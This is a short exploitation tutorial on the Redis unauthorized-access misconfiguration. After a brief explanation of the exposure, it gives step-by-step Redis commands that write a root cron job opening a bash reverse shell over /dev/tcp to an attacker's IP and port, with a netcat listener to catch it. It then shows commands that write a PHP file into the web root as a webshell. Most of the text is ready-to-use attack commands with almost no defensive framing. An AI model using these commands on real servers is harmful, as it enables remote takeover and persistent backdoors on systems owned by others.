1. Vulnerability Introduction#
By default, Redis is bound to 0.0.0.0:6379. If no relevant strategies are adopted, such as adding firewall rules to prevent access from untrusted sources, Redis services will be exposed to the public network. If password authentication is not set (usually empty), it will allow unauthorized access to Redis and reading Redis data for any user who can access the target server.
Attackers can exploit the unauthorized access vulnerability by using Redis's own config command to log in to the target server, add scheduled tasks, write webshells, and perform other operations.
The following operations are performed under the premise of an existing Redis unauthorized access vulnerability.
2. Exploiting Scheduled Tasks to Reverse Shell#
https://github.com/caoxinyu/RedisClient/releases
https://github.com/dmajkic/redis/downloads
Run the following commands on the compromised host connected to the vulnerability:
set xx "\n* * * * * bash -i >& /dev/tcp/IP Address/Port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
Run the following command locally:
nc -lvnp Port
3. Writing Webshell in Redis#
config set dir /var/www/html
config set dbfilename test123.php
set webshell "<?php phpinfo(); ?>"
save